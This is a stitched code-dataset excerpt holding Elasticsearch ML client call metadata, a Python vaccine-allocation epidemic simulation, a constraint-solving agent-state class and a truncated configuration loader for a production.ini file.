| [((136, 165), 'elasticsearch.client.utils.query_params', 'query_params', (['"""from_"""', '"""size"""'], {}), "('from_', 'size')\n", (148, 165), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((543, 557), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (555, 557), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((940, 954), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (952, 954), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((1364, 1475), 'elasticsearch.client.utils.query_params', 'query_params', (['"""anomaly_score"""', '"""desc"""', '"""end"""', '"""exclude_interim"""', '"""expand"""', '"""from_"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('anomaly_score', 'desc', 'end', 'exclude_interim', 'expand',\n 'from_', 'size', 'sort', 'start')\n", (1376, 1475), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((2661, 2701), 'elasticsearch.client.utils.query_params', 'query_params', (['"""reset_end"""', '"""reset_start"""'], {}), "('reset_end', 'reset_start')\n", (2673, 2701), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((3533, 3565), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""', '"""timeout"""'], {}), "('force', 'timeout')\n", (3545, 3565), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4265, 4279), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (4277, 4279), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4640, 4654), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (4652, 4654), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4851, 4865), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (4863, 4865), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((5419, 5433), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (5431, 5433), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((5820, 5859), 'elasticsearch.client.utils.query_params', 'query_params', (['"""end"""', '"""start"""', '"""timeout"""'], {}), "('end', 'start', 'timeout')\n", (5832, 5859), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((6759, 6859), 'elasticsearch.client.utils.query_params', 'query_params', (['"""desc"""', '"""end"""', '"""exclude_interim"""', '"""from_"""', '"""record_score"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('desc', 'end', 'exclude_interim', 'from_', 'record_score',\n 'size', 'sort', 'start')\n", (6771, 6859), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((7802, 7816), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (7814, 7816), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8404, 8418), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), 
'()\n', (8416, 8418), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8898, 8912), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (8910, 8912), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((9532, 9546), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (9544, 9546), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((10074, 10147), 'elasticsearch.client.utils.query_params', 'query_params', (['"""advance_time"""', '"""calc_interim"""', '"""end"""', '"""skip_time"""', '"""start"""'], {}), "('advance_time', 'calc_interim', 'end', 'skip_time', 'start')\n", (10086, 10147), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((11398, 11430), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""', '"""timeout"""'], {}), "('force', 'timeout')\n", (11410, 11430), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((12091, 12105), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (12103, 12105), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((12590, 12611), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""'], {}), "('force')\n", (12602, 12611), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13160, 13174), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (13172, 13174), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13922, 13936), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (13934, 13936), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((14335, 14349), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (14347, 14349), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((14708, 14737), 'elasticsearch.client.utils.query_params', 'query_params', (['"""from_"""', '"""size"""'], {}), "('from_', 'size')\n", (14720, 14737), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((15567, 15671), 'elasticsearch.client.utils.query_params', 'query_params', (['"""desc"""', '"""end"""', '"""exclude_interim"""', '"""from_"""', '"""influencer_score"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('desc', 'end', 'exclude_interim', 'from_', 'influencer_score',\n 'size', 'sort', 'start')\n", (15579, 15671), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((16782, 16796), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (16794, 16796), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17389, 17410), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""'], {}), "('force')\n", (17401, 17410), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17996, 18010), 'elasticsearch.client.utils.query_params', 'query_params', ([], 
{}), '()\n', (18008, 18010), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((18398, 18440), 'elasticsearch.client.utils.query_params', 'query_params', (['"""delete_intervening_results"""'], {}), "('delete_intervening_results')\n", (18410, 18440), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((19283, 19344), 'elasticsearch.client.utils.query_params', 'query_params', (['"""desc"""', '"""end"""', '"""from_"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('desc', 'end', 'from_', 'size', 'sort', 'start')\n", (19295, 19344), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((20404, 20418), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (20416, 20418), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((460, 508), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""filters"""', 'filter_id'], {}), "('_xpack', 'ml', 'filters', filter_id)\n", (470, 508), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((853, 905), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id)\n", (863, 905), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((1267, 1329), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_stats"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_stats')\n", (1277, 1329), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((2515, 2607), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""buckets"""', 'timestamp'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results',\n 'buckets', timestamp)\n", (2525, 2607), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((3394, 3458), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_data"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_data')\n", (3404, 3458), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4169, 4230), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_stop"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_stop')\n", (4179, 4230), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4550, 4605), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id)\n", (4560, 4605), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((5318, 5373), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id)\n", (5328, 5373), False, 'from 
elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((6651, 6713), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_start"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_start')\n", (6661, 6713), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((7667, 7744), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""records"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results', 'records')\n", (7677, 7744), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8292, 8358), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_update"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_update')\n", (8302, 8358), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8804, 8852), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""filters"""', 'filter_id'], {}), "('_xpack', 'ml', 'filters', filter_id)\n", (8814, 8852), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((9423, 9486), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_update"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_update')\n", (9433, 9486), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((9975, 10039), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_preview"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_preview')\n", (9985, 10039), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((11287, 11352), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_flush"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_flush')\n", (11297, 11352), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((11991, 12056), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_close"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_close')\n", (12001, 12056), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((12491, 12555), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_open"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_open')\n", (12501, 12555), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13070, 13125), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id)\n", (13080, 13125), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13766, 13868), 'elasticsearch.client.utils._make_path', 
'_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id', '"""_update"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id, '_update')\n", (13776, 13868), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((14252, 14300), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""filters"""', 'filter_id'], {}), "('_xpack', 'ml', 'filters', filter_id)\n", (14262, 14300), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((15416, 15513), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""categories"""', 'category_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results',\n 'categories', category_id)\n", (15426, 15513), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((16643, 16728), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""influencers"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results',\n 'influencers')\n", (16653, 16728), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17291, 17343), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id)\n", (17301, 17343), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17909, 17961), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id)\n", (17919, 17961), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((18298, 18363), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_stats"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_stats')\n", (18308, 18363), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((19127, 19229), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id', '"""_revert"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id, '_revert')\n", (19137, 19229), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((20259, 20350), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id)\n", (20269, 20350), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((20941, 21032), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id)\n", (20951, 21032), 
False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n')] |
import dask
import numpy as np
import pandas as pd
from epimargin.models import Age_SIRVD
from epimargin.utils import annually, normalize, percent, years
from studies.vaccine_allocation.commons import *
from tqdm import tqdm
import warnings
warnings.filterwarnings("error")
num_sims = 1000
simulation_range = 1 * years
phi_points = [_ * percent * annually for _ in (25, 50, 100, 200)]
simulation_initial_conditions = pd.read_csv(data/f"all_india_coalesced_scaling_Apr15.csv")\
.drop(columns = ["Unnamed: 0"])\
.set_index(["state", "district"])
rerun_states = ["Telangana", "Uttarakhand", "Jharkhand", "Arunachal Pradesh", "Nagaland", "Sikkim"] + coalesce_states
districts_to_run = simulation_initial_conditions
num_age_bins = 7
seed = 0
MORTALITY = [6, 5, 4, 3, 2, 1, 0]
CONTACT = [1, 2, 3, 4, 0, 5, 6]
CONSUMPTION = [4, 5, 6, 3, 2, 1, 0]
def save_metrics(tag, policy, dst = tev_src):
np.savez_compressed(dst/f"{tag}.npz",
dT = policy.dT_total,
dD = policy.dD_total,
pi = policy.pi,
q0 = policy.q0,
q1 = policy.q1,
Dj = policy.D
)
def prioritize(num_doses, S, prioritization):
Sp = S[:, prioritization]
dV = np.where(Sp.cumsum(axis = 1) <= num_doses, Sp, 0)
dV[np.arange(len(dV)), (Sp.cumsum(axis = 1) > dV.cumsum(axis = 1)).argmax(axis = 1)] = num_doses - dV.sum(axis = 1)
return dV[:, sorted(range(len(prioritization)), key = prioritization.__getitem__)].clip(0, S)
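# Illustration of `prioritize` (example values, not from the original study): with one
# simulation row S = [[2, 8, 4, 6, 1, 3, 5]], num_doses = 10 and the MORTALITY order
# [6, 5, 4, 3, 2, 1, 0], bins are filled oldest-first: bin 6 gets 5 doses, bin 5 gets 3,
# bin 4 gets 1, and the remaining dose goes to bin 3. The result is returned in the
# original age-bin order and clipped to S.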
def process(district_data):
(
(state, district), state_code,
sero_0, N_0, sero_1, N_1, sero_2, N_2, sero_3, N_3, sero_4, N_4, sero_5, N_5, sero_6, N_6, N_tot,
Rt, Rt_upper, Rt_lower, S0, I0, R0, D0, dT0, dD0, V0, T_ratio, R_ratio
) = district_data
try:
S0 = int(S0)
except ValueError as e:
print (state, district, e)
return
Sj0 = np.array([(1 - sj) * Nj for (sj, Nj) in zip([sero_0, sero_1, sero_2, sero_3, sero_4, sero_5, sero_6], [N_0, N_1, N_2, N_3, N_4, N_5, N_6])])
# distribute historical doses assuming mortality prioritization
Sj0 = prioritize(V0, Sj0.copy()[None, :], MORTALITY)[0]
def get_model(seed = 0):
model = Age_SIRVD(
name = state_code + "_" + district,
population = N_tot - D0,
dT0 = (np.ones(num_sims) * dT0).astype(int),
Rt0 = 0 if S0 == 0 else Rt * N_tot / S0,
S0 = np.tile( Sj0, num_sims).reshape((num_sims, -1)),
I0 = np.tile((fI * I0).T, num_sims).reshape((num_sims, -1)),
R0 = np.tile((fR * R0).T, num_sims).reshape((num_sims, -1)),
D0 = np.tile((fD * D0).T, num_sims).reshape((num_sims, -1)),
mortality = np.array(list(OD_IFRs.values())),
infectious_period = infectious_period,
random_seed = seed,
)
model.dD_total[0] = np.ones(num_sims) * dD0
model.dT_total[0] = np.ones(num_sims) * dT0
return model
for phi in phi_points:
num_doses = phi * (S0 + I0 + R0)
sim_tag = f"{state_code}_{district}_phi{int(phi * 365 * 100)}_"
random_model, mortality_model, contact_model, no_vax_model = [get_model(seed) for _ in range(4)]
for t in range(simulation_range):
if t <= 1/phi:
dV_random = num_doses * normalize(random_model.N[-1], axis = 1).clip(0)
dV_mortality = prioritize(num_doses, mortality_model.N[-1], MORTALITY ).clip(0)
dV_contact = prioritize(num_doses, contact_model.N[-1], CONTACT ).clip(0)
else:
dV_random, dV_mortality, dV_contact = np.zeros((num_sims, 7)), np.zeros((num_sims, 7)), np.zeros((num_sims, 7))
random_model .parallel_forward_epi_step(dV_random, num_sims = num_sims)
mortality_model.parallel_forward_epi_step(dV_mortality, num_sims = num_sims)
contact_model .parallel_forward_epi_step(dV_contact, num_sims = num_sims)
no_vax_model .parallel_forward_epi_step(dV = np.zeros((7, num_sims))[:, 0], num_sims = num_sims)
if phi == phi_points[0]:
save_metrics(sim_tag + "novax", no_vax_model )
save_metrics(sim_tag + "random", random_model )
save_metrics(sim_tag + "mortality", mortality_model)
save_metrics(sim_tag + "contact", contact_model )
if __name__ == "__main__":
distribute = False
if distribute:
with dask.config.set({"scheduler.allowed-failures": 1}):
client = dask.distributed.Client(n_workers = 1, threads_per_worker = 1)
print(client.dashboard_link)
with dask.distributed.get_task_stream(client) as ts:
futures = []
for district in districts_to_run.itertuples():
futures.append(client.submit(process, district, key = ":".join(district[0])))
dask.distributed.progress(futures)
else:
failures = []
for t in tqdm(districts_to_run.itertuples(), total = len(districts_to_run)):
process(t)
# try:
# process(t)
# except Exception as e:
# failures.append((e, t))
for failure in failures:
print(failure)
| [
"dask.config.set",
"dask.distributed.progress",
"numpy.tile",
"numpy.ones",
"pandas.read_csv",
"dask.distributed.get_task_stream",
"epimargin.utils.normalize",
"dask.distributed.Client",
"numpy.zeros",
"numpy.savez_compressed",
"warnings.filterwarnings"
]
| [((242, 274), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""error"""'], {}), "('error')\n", (265, 274), False, 'import warnings\n'), ((937, 1076), 'numpy.savez_compressed', 'np.savez_compressed', (["(dst / f'{tag}.npz')"], {'dT': 'policy.dT_total', 'dD': 'policy.dD_total', 'pi': 'policy.pi', 'q0': 'policy.q0', 'q1': 'policy.q1', 'Dj': 'policy.D'}), "(dst / f'{tag}.npz', dT=policy.dT_total, dD=policy.\n dD_total, pi=policy.pi, q0=policy.q0, q1=policy.q1, Dj=policy.D)\n", (956, 1076), True, 'import numpy as np\n'), ((2950, 2967), 'numpy.ones', 'np.ones', (['num_sims'], {}), '(num_sims)\n', (2957, 2967), True, 'import numpy as np\n'), ((3002, 3019), 'numpy.ones', 'np.ones', (['num_sims'], {}), '(num_sims)\n', (3009, 3019), True, 'import numpy as np\n'), ((4548, 4598), 'dask.config.set', 'dask.config.set', (["{'scheduler.allowed-failures': 1}"], {}), "({'scheduler.allowed-failures': 1})\n", (4563, 4598), False, 'import dask\n'), ((4621, 4679), 'dask.distributed.Client', 'dask.distributed.Client', ([], {'n_workers': '(1)', 'threads_per_worker': '(1)'}), '(n_workers=1, threads_per_worker=1)\n', (4644, 4679), False, 'import dask\n'), ((4992, 5026), 'dask.distributed.progress', 'dask.distributed.progress', (['futures'], {}), '(futures)\n', (5017, 5026), False, 'import dask\n'), ((433, 493), 'pandas.read_csv', 'pd.read_csv', (["(data / f'all_india_coalesced_scaling_Apr15.csv')"], {}), "(data / f'all_india_coalesced_scaling_Apr15.csv')\n", (444, 493), True, 'import pandas as pd\n'), ((4742, 4782), 'dask.distributed.get_task_stream', 'dask.distributed.get_task_stream', (['client'], {}), '(client)\n', (4774, 4782), False, 'import dask\n'), ((3722, 3745), 'numpy.zeros', 'np.zeros', (['(num_sims, 7)'], {}), '((num_sims, 7))\n', (3730, 3745), True, 'import numpy as np\n'), ((3747, 3770), 'numpy.zeros', 'np.zeros', (['(num_sims, 7)'], {}), '((num_sims, 7))\n', (3755, 3770), True, 'import numpy as np\n'), ((3772, 3795), 'numpy.zeros', 'np.zeros', (['(num_sims, 7)'], {}), '((num_sims, 7))\n', (3780, 3795), True, 'import numpy as np\n'), ((2467, 2489), 'numpy.tile', 'np.tile', (['Sj0', 'num_sims'], {}), '(Sj0, num_sims)\n', (2474, 2489), True, 'import numpy as np\n'), ((2549, 2579), 'numpy.tile', 'np.tile', (['(fI * I0).T', 'num_sims'], {}), '((fI * I0).T, num_sims)\n', (2556, 2579), True, 'import numpy as np\n'), ((2631, 2661), 'numpy.tile', 'np.tile', (['(fR * R0).T', 'num_sims'], {}), '((fR * R0).T, num_sims)\n', (2638, 2661), True, 'import numpy as np\n'), ((2713, 2743), 'numpy.tile', 'np.tile', (['(fD * D0).T', 'num_sims'], {}), '((fD * D0).T, num_sims)\n', (2720, 2743), True, 'import numpy as np\n'), ((4135, 4158), 'numpy.zeros', 'np.zeros', (['(7, num_sims)'], {}), '((7, num_sims))\n', (4143, 4158), True, 'import numpy as np\n'), ((2341, 2358), 'numpy.ones', 'np.ones', (['num_sims'], {}), '(num_sims)\n', (2348, 2358), True, 'import numpy as np\n'), ((3405, 3442), 'epimargin.utils.normalize', 'normalize', (['random_model.N[-1]'], {'axis': '(1)'}), '(random_model.N[-1], axis=1)\n', (3414, 3442), False, 'from epimargin.utils import annually, normalize, percent, years\n')] |
'''Every agent has an agent state, which is its local view of the world'''
import numpy as np
import itertools
class AgentState:
def __init__(self, name, agt, seed=1234):
self.name = name
self.prng = np.random.RandomState(seed)
        # contains the variable assignments (explored) for this agent and its neighbors
self.variables_assignments = {var.name: var.value for var in agt.variables}
self.this_agt = agt
## Data structures to explore assignment local to an agent
self.my_vars = [var.name for var in agt.variables]
# the iterator to all possible assignment for this agent
self.assignment_it = 0
# All possible assignments for the variables of this agent
domains = [var.domain for var in agt.variables]
self.agt_assignments_list = list(itertools.product(*domains))
def addNeighborsVariables(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def recvNeighborsValues(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def copyAgtAssignmentToState(self):
for var in self.this_agt.variables:
self.variables_assignments[var.name] = var.value
def nextAssignment(self):
'''
        If a next assignment for the agent's local variables exists, store it in
        self.variables_assignments and return True. Otherwise return False.
'''
if self.assignment_it < len(self.agt_assignments_list):
self.setAssignmentIt(self.assignment_it)
self.assignment_it += 1
return True
else:
# Reset iterator
self.assignment_it = 0
return False
def setAssignmentIt(self, it):
for i, var_name in enumerate(self.my_vars):
self.variables_assignments[var_name] = self.agt_assignments_list[it][i] | [
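# Minimal usage sketch (the `agt` object is hypothetical; it only needs a `variables`
# collection whose items expose `name`, `value` and `domain`):
#
#   state = AgentState('a1', agt)
#   while state.nextAssignment():
#       cost = evaluate(state.variables_assignments)  # `evaluate` is a placeholder
#
# nextAssignment() walks through every combination in agt_assignments_list (the
# itertools.product of the local domains), writing each one into variables_assignments
# before returning True, and returns False once all combinations have been visited.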
"itertools.product",
"numpy.random.RandomState"
]
| [((221, 248), 'numpy.random.RandomState', 'np.random.RandomState', (['seed'], {}), '(seed)\n', (242, 248), True, 'import numpy as np\n'), ((837, 864), 'itertools.product', 'itertools.product', (['*domains'], {}), '(*domains)\n', (854, 864), False, 'import itertools\n')] |
import configparser
import logging

log = logging.getLogger(__name__)

c = configparser.ConfigParser()
c.read("production.ini")
config = {}
config['host'] = c['dboption']['chost']
config['port'] = int(c['dboption']['cport'])
config['user'] = c['dboption']['cuser']
config['pw'] = c['dboption']['cpw']
config['db'] = c['dboption']['cdb']
config['homepath'] = c['option']['home']
config['hosturl'] = c['option']['hosturl']
config['news'] = c['news']
config['smtp'] = {}
config['smtp']['sender'] = c['option']['smtp-sender']
config['smtp']['server'] = c['option']['smtp']
config['collection_table'] = {}
config['collection_table']['template'] = c['option']['template_collection_sheet']
config['collection_table']['ordered'] = c['option']['collection_table_ordered']
config['collection_table']['filled'] = c['option']['collection_table_filled']
config['dwb'] = {}
config['dwb']['name_suffix'] = c['option']['dwb_name_suffix']
config['dwb']['connection_string'] = c['option']['dwb_connection_string']
config['dwb']['use_dwb'] = int(c['option']['use_dwb'])
if not c.has_option('option', 'dev_group'):
log.critical('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
raise NameError('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
config['dev_group'] = c['option']['dev_group']
taxon_ids = """100408, 100430, 100431, 100451, 100453, 3000243, 3100522, 3200125,
3200126, 4000014, 4402020, 4403366, 4403382, 4403383, 4404012,
4404135, 4404679, 4405947, 4406565, 4407062, 4408012, 5000093,
5000095, 5000203, 5009403, 5009532, 5100497, 5200013, 5210014,
5220011, 5400004, 5401236, 5413793, 5416518, 5416650, 5426341,
5428084, 5428327, 5428727, 5428849, 5428977, 5429029, 5429176,
5429405, 5430460, 5431215"""
states = {'de': ["Europa",
"Baden-Württemberg",
"Bayern",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hessen",
"Mecklenburg-Vorpommern",
"Niedersachsen",
"Nordrhein-Westfalen",
"Rheinland-Pfalz",
"Saarland",
"Sachsen",
"Sachsen-Anhalt",
